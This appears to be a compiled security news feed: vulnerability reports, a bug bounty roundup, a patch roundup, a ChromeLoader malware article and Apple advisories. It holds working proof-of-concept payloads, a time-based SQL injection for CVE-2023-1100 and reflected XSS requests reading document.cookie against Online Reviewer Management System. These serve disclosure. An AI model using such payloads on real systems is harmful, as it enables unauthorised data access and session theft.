    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/reservation/contact.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=02qotonqdgu64aj0uljkiarmul
    Connection: close
    
    fullname=1' and (select 1 from (select(sleep(20)))b) and 'a'='a&email=2%40gmail.com&subject=3&message=4
    

The server's response time is 20 seconds

CVE-2023-1100: bug_report/SQLi-1.md at main · jackswordsz/bug_report

New web targets for the discerning hacker

New web targets for the discerning hacker

Belgium became a haven for ethical hackers following the adoption of a nationwide safe harbor agreement last month.

The framework means that well-intentioned security researchers are free from legal jeopardy when they come to report computer security vulnerabilities in any system located in the European country – providing they follow a strict set of conditions and rules of conduct.

The guidelines, announced by the Centre for Cyber Security Belgium, apply to both private and public sector organizations. Belgium is further ahead on the curve, but it’s hoped that the scheme will inspire other countries to follow suit and companies to roll out vulnerability disclosure programs of their own.

In less congenial bug bounty-related news, independent researcher Peter Geissler publicly released the details of a set of vulnerabilities affecting Lexmark printers rather than accepting what he considered a derisory reward. The security bugs – which could be chained together to create a remote code execution attack – have since been fixed.

Another example of researchers baulking at bug bounty conditions came in the disclosure of a web security flaw in a marketing widget from analysts Gartner.

Security researcher Justin Steven wanted to write-up the technical details of a DOM-based cross-site scripting vulnerability in the Gartner Peer Insights widget, but the analyst firm warned the researcher that that it violated the rules of the private bug bounty program.

Steven publicly disclosed technical details of the vulnerability anyway, even though this meant he went without payment for the find.

There was drama aplenty when a new host of popular hacking tool XSS Hunter disclosed telemetry (anonymized statistics about the vulnerabilities unearthed) from security researchers using its version of the utility. Truffle Security faced a privacy backlash from security researchers upset that it was seemingly “peering over their shoulder” and going through their findings.

In response to the criticism, Truffle Security began offering end-to-end encryption as an option to security researchers using its version of XSS Hunter.

**The latest bug bounty programs for March 2023**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**ATG (Enhanced)**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**ATG has raised rewards for medium, high, and critical bugs, and broadened its scope to encompass .atg.se and its subdomains. ATG is a Swedish gaming company that specializes in horse racing.

Check out the ATG bug bounty page for more details

**Bybit**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$20,000

**Outline:  
**The cryptocurrency exchange is paying out between $5,000 and $20,000 for the highest tier of criticality. The sole target in scope is bybit.com.

Check out the Bybit bug bounty page for more details

**Grindr**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**The location-based social networking and dating application for the LGBTQ community cites RCE, arbitrary SQL queries on production databases, and significant authentication bypass flaws as potentially critical bugs.

Check out the Grindr bug bounty page for more details

**Linktree**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$7,500

**Outline:  
**Australian social media tool Linktree, which has 30 million users globally, has put “most” of its assets within the scope of the bug bounty program.

Check out the Linktree bug bounty page for more details

**Malwarebytes**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$2,000

**Outline:  
**The anti-malware firm is offering payouts of between $50 and $2,000 for confirmed vulnerabilities. Those posing an RCE risk to Malwarebytes’ web properties or customers running its endpoint protection software, or leading to the takeover of AWS cloud infrastructure, will attract the greatest rewards.

Check out the Malwarebytes bug bounty page for more details

**Miro**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**The collaborative whiteboarding platform is offering rewards of up to $3,000. Out of scope assets include Jira Cards by Miro, Miro for Confluence, and Miro for Jira Cloud.

Check out the Miro bug bounty page for more details

**Ninja Kiwi Games**

**Program provider:  
**Intigriti

**Program type:  
**Public

**Max reward:  
**$3,750

**Outline:  
**The New Zealand-based video game developer has launched a second bug bounty program after a successful 2021 forerunner. Ninja Kiwi Games has created the Bloons, Bloons TD, and SAS: Zombie Assault franchises.

Check out the Ninja Kiwi Games bug bounty page for more details

**QNAP**

**Program provider:  
**Independent

**Program type:  
**Public

**Max reward:  
**Undisclosed

**Outline:  
**QNAP, the Taiwanese manufacturer of network-attached storage appliances, has invited hackers to probe its operating systems, applications, and cloud services for vulnerabilities.

Check out the QNAP bug bounty page for more details

**Skinport**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$6,000

**Outline:  
**Skinport, a marketplace for digital in-game items, has launched a program with rewards for critical flaws that open the door to trading or purchase manipulations. Vulnerabilities that result in unauthorized access to project servers or the disclosure of confidential data are also within scope.

Check out the Skinport bug bounty page for more details

**Spin by OXXO**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**In scope are an API plus iOS and Android mobile applications of Spin, a fintech app and payment card from Mexican convenience store chain Oxxo.

Check out the Spin by OXXO bug bounty page for more details

**Xdefi Technologies**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Xdefi, a cross-chain wallet extension for cryptocurrencies and NFTs, has included in the in-scope assets Xdefi Extension (Chromium web extension) and app, with rewards based on severity as per the CVSS (the Common Vulnerability Scoring Standard).

Check out the Xdefi bug bounty page for more details

**Zabbix**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**Zabbix, a vendor which provides open source infrastructure monitoring technologies, is offering up to $1,000 for high severity bugs and $3,000 for critical flaws.

Check out the Zabbix bug bounty page for more information

**Other bug bounty and VDP news this month**

*   Google has expanded its OSS Fuzz code testing service by upgrading its reward program and increasing the number of computing languages covered by the project
*   The search engine giant has also paid out its largest-ever bug bounty – worth a potentially life-changing £500,000 ($605,000) – for an Android\-related vulnerability. Google is staying tight-lipped about the details of the flaw but ITPro has narrowed down the list of possibilities
*   Intel reports that it paid out $935,000 in bug bounties last year. The chip giant’s Intel Product Security Report (pdf) said that it triaged 243 vulnerabilities in 2022, 90 of which were discovered by security researchers and reported through its bug bounty programs. The vendor “engaged 151 researchers last year, more than double compared to the previous three years”, Security Week reports.
*   An in-depth article on the YesWeHack blog by security researchers BitK and SakiiR offers a technical perspective on detecting and exploiting prototype pollution vulnerabilities in JavaScript. The research builds on earlier work by Portswigger’s Gareth Heyes on detecting server-side prototype pollution-type security flaws.
*   Security researcher Mike Takahashi has put together a Twitter thread on the so-hot topic of how AI-powered chatbots such as ChatGPT might be able to assist bug bounty hunters. The social media “brainstorm” by Takahashi is the second part in what might become an ongoing series.

Additional reporting by Adam Bannister

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for February 2023

Bug Bounty Radar // The latest bug bounty programs for March 2023

An issue was discovered in Online Reviewer Management System v1.0. There is a XSS vulnerability via reviewer_0/admins/assessments/course/course-update.php.

Permalink

**Online Reviewer Management System v1.0 by janobe has Cross-site scripting (reflected)**

BUG\_Author: crazychen123

Accessing admin accounts: Username: admin / Password: admin

Vulnerability File: reviewer\_0/admins/assessments/course/course-update.php

Parameter "courseID" (GET), exists XSS vulnerability

Payload1:courseID=1"><script>alert(1111)</script>

#POC：

    GET /reviewer_0/admins/assessments/course/course-update.php?courseID=1%22%3E%3Cscript%3Ealert(1111)%3C/script%3E HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=8004tqeh90ds1l3vr4t60bq179
    Connection: close
    

Payload2:courseID=1"><script>alert(document.cookie)</script>

#POC：

    GET /reviewer_0/admins/assessments/course/course-update.php?courseID=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=8004tqeh90ds1l3vr4t60bq179
    Connection: close

CVE-2023-25431: bug_report/XSS-1.md at main · hundanchen69/bug_report

Plus: Microsoft fixes several zero-day bugs, Google patches Chrome and Android, Mozilla rids Firefox of a full-screen vulnerability, and more.

February has been a big month for security updates, with the likes of Apple, Microsoft, and Google releasing patches to fix serious vulnerabilities. Meanwhile, a number of enterprise bugs have been squashed by firms that include VMware, SAP, and Citrix. 

The flaws fixed during the month include several that were being used in real-life attacks, so it’s worth checking that your software is up to date.

Here’s everything you need to know about the security updates released this month. 

Apple iOS and iPadOS 16.3.1

Just weeks after the release of iOS 16.3, Apple issued iOS and iPadOS 16.3.1—an emergency patch to fix vulnerabilities that included a flaw in the browser engine WebKit that was already being used in attacks.

Tracked as CVE-2023-23529, the already exploited bug could lead to arbitrary code execution, Apple warned on its support page. “Apple is aware of a report that this issue may have been actively exploited,” the firm added. Another flaw patched in iOS 16.3.1 is in the Kernel at the heart of the iPhone operating system. The bug, which is tracked as CVE-2023-23514, could allow an attacker to execute arbitrary code with Kernel privileges.

Later in the month, Apple documented another vulnerability fixed in iOS 16.3.1, CVE-2023-23524. Reported by David Benjamin, a software engineer at Google, the flaw could enable a denial of service attack via a maliciously crafted certificate.

Apple also released macOS Ventura 13.2.1, tvOS 16.3.2, and watchOS 9.3.1 during the month.

Microsoft 

In mid-February, Microsoft warned that its Patch Tuesday has fixed 76 security vulnerabilities, three of which are already being used in attacks. Seven of the flaws are marked as critical, according to Microsoft’s update guide.

Tracked as CVE-2023-21823, one of the most serious of the already exploited bugs in the Windows graphics component could allow an attacker to gain System privileges.

Another already exploited flaw, CVE-2023-21715, is a feature bypass issue in Microsoft Publisher, while CVE-2023-23376 is a privilege escalation vulnerability in Windows common log file system driver.

That’s a lot of zero-day flaws fixed in one release, so take it as a prompt to update your Microsoft-based systems as soon as possible.

Google Android 

Android’s February security update is here, fixing multiple vulnerabilities in devices running the tech giant’s smartphone software. The most severe of these issues is a security vulnerability in the Framework component that could lead to local escalation of privilege with no additional privileges needed, Google noted in an advisory. 

Among the issues fixed in the Framework, eight are rated as having a high impact. Meanwhile, Google has squashed six bugs in the Kernel, as well as flaws in the System, MediaTek, and Unisoc components.

During the month, Google patched multiple privilege escalation flaws, as well as information disclosure and denial of service vulnerabilities. The company also released a patch for three Pixel-specific security issues. The Android February patch is already available for Google’s Pixel devices, while Samsung has moved quickly to issue the update to users of its Galaxy Note 20 series.

Google Chrome 

Google has released Chrome 110 for its browser, fixing 15 security vulnerabilities, three of which are rated as having a high impact. Tracked as CVE-2023-0696, the first of these is a type confusion bug in the V8 JavaScript engine, Google wrote in a security advisory. 

Meanwhile, CVE-2023-0697 is a flaw that allows inappropriate implementation in full-screen mode, and CVE-2023-0698 is an out-of-bounds read flaw in WebRTC. Four medium-severity vulnerabilities include a use after free in GPU, a heap buffer overflow flaw in WebUI, and a type confusion vulnerability in Data Transfer. Two further flaws are rated as having a low impact.

Apple Users Need to Update iOS Now to Patch Serious Flaws

By Deeba Ahmed
What's worse, in the new campaign, ChromeLoader malware evades detection by security software.
This is a post from HackRead.com Read the original post: Fake ROBLOX and Nintendo game cracks drop ChromeLoader malware

Beware of fake ROBLOX, Steam and Nintendo game cracks that may contain the ChromeLoader malware. Learn more about the threat and how to protect your device from this malicious software.

The cybersecurity researchers at AhnLab Security Emergency response Center (ASEC) have discovered a new ChromeLoader malware campaign in which hackers managed to bypass antivirus programs and other cybersecurity mechanisms. This campaign is dubbed uncommon due to the file type attackers have used to evade detection.

**Hackers Using VHD Files As Popular Games Cracks**

According to AhnLab researchers, the ChromeLoader malware campaign is distributed via VHD (virtual hard disk) files, which is a different choice because, usually, ISO optical disc image format files are used in such campaigns.

However, in this case, attackers have used VHD files, which are distributed with filenames that seem like cracks or hacks for Steam and Nintendo games. The objective is to modify browser settings by infecting web browsers, such as Google Chrome, and diverting traffic to bogus advertising websites. A VHD file can be easily mounted on a Windows device and works with most virtualization software as well.

One of the malicious websites (Screenshot credit: ACSE)

“When a VHD file is downloaded through this process, the user can easily mistake the malicious VHD file for a game-related program,” ASEC researchers said. “Disguising malware as game hacks and crack programs is a method employed by many threat actors,” researchers said in a blog post.

**What is ChromeLoader?**

ChromeLoader, also known as ChromeBack and Choziosi, surfaced first as a browser-hijacking credential stealer in January 2022. In May 2022, ChromeLoader malware was pushed into pirated games and QR codes.

Eventually, it evolved into a multi-faceted, potent threat capable of stealing sensitive user data, deploying ransomware, and dropping decompression bombs.

ChromeLoader can also conduct click fraud by leveraging browser extensions to monetize clicks. Many of its new versions can invade both macOS and Windows devices. The shift from ISO to VHD files indicates that ChromeLoader has undergone another round of upgrades.

**Numerous Websites Promoting Fake Game Cracks/Hacks**

Researchers noticed that several malicious websites were marketing cracked versions of famous games, including the following:

*   ROBLOX
*   Elden Ring
*   Dark Souls 3
*   Need for Speed
*   Mario Kart 8 Deluxe
*   Super Mario Odyssey
*   Call of Duty and more
*   Red Dead Redemption 2
*   The Legend of Zelda: Breath of the Wild

Additionally, software versions such as Adobe Photoshop and Microsoft Office are also marketed in this campaign.

Although the malicious websites hosting fraudulent game hacks and software versions have been taken offline, gamers and unsuspecting users should beware of this campaign.

Instead of downloading the game, they may receive ChromeLoader malware that can launch unwanted ads on their devices and steal credentials from web browsers and other saved data.

Users looking for pirated video game hacks and software are the key targets of attackers, who are lured into downloading VHD files from compromised websites appearing in search results.

1.  Malicious pirated games disable Windows Defender
2.  This malware hides in VPN, pirated security software
3.  Pirated software drop cryptomining malware on Macbook
4.  Pirated Version of Fire and Fury Book Loaded with Malware
5.  Inmates pirated movies from computers built with spare parts

Fake ROBLOX and Nintendo game cracks drop ChromeLoader malware

A use after free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.2.1, iOS 16.3.1 and iPadOS 16.3.1. An app may be able to execute arbitrary code with kernel privileges..

This document describes the security content of iOS 16.3.1 and iPadOS 16.3.1.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**iOS 16.3.1 and iPadOS 16.3.1**

Released February 13, 2023

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of Google Project Zero

**Security**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing a maliciously crafted certificate may lead to a denial-of-service

Description: A denial-of-service issue was addressed with improved input validation.

CVE-2023-23524: David Benjamin of Google Chrome

Entry added February 20, 2023

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A type confusion issue was addressed with improved checks.

WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

**Additional recognition**

We would like to acknowledge The Citizen Lab at The University of Toronto’s Munk School for their assistance.

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: February 20, 2023

CVE-2023-23514: About the security content of iOS 16.3.1 and iPadOS 16.3.1

A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Ventura 13.2.1. An app may be able to observe unprotected user data..

This document describes the security content of macOS Ventura 13.2.1.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**macOS Ventura 13.2.1**

Released February 13, 2023

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges.

Description: A use after free issue was addressed with improved memory management.

CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of Google Project Zero

**Security**

Available for: macOS Ventura

Impact: Processing a maliciously crafted certificate may lead to a denial-of-service

Description: A denial-of-service issue was addressed with improved input validation.

CVE-2023-23524: David Benjamin of Google Chrome

Entry added February 20, 2023

**Shortcuts**

Available for: macOS Ventura

Impact: An app may be able to observe unprotected user data.

Description: A privacy issue was addressed with improved handling of temporary files.

CVE-2023-23522: Wenchao Li and Xiaolong Bai of Alibaba Group

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A type confusion issue was addressed with improved checks.

WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: February 20, 2023

Tag

#chrome